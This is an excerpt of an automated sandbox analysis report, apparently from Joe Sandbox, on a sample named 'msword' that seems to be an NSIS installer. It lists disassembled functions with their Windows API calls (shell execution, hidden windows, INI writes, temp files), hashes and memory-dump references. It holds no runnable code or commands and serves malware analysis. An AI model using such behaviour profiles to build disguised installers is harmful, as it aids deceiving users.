                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 2568930968-0
                                                                                        • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                        • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                        • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                        • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                        Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 865 402713-40273b call 406009 * 2 870 402746-402749 865->870 871 40273d-402743 call 40145c 865->871 873 402755-402758 870->873 874 40274b-402752 call 40145c 870->874 871->870 875 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 873->875 876 40275a-402761 call 40145c 873->876 874->873 876->875
                                                                                        APIs
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                                                        • String ID: <RM>$WarsFeltMadridFarmsPee$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                        • API String ID: 247603264-1220653561
                                                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                        Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                        • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                        • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                        • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                        • API String ID: 3156913733-2180253247
                                                                                        • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                        • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                        • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                        • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                        Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: nsa
                                                                                        • API String ID: 1716503409-2209301699
                                                                                        • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                        • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                        • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                        • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                        Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                        • String ID: HideWindow
                                                                                        • API String ID: 1249568736-780306582
                                                                                        • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                        • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                        Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                        • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                        • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                        • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                        Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                        • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                        • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                        • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                        Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                        • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                        • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                        • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                        Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                        • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                        • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                        • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                        Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                        • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                        • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                        • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                        Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                        • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                        • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                        • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                        Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                        • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree
                                                                                        • String ID:
                                                                                        • API String ID: 3394109436-0
                                                                                        • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                        • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                        • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                        • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                        Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                        Memory Dump Source
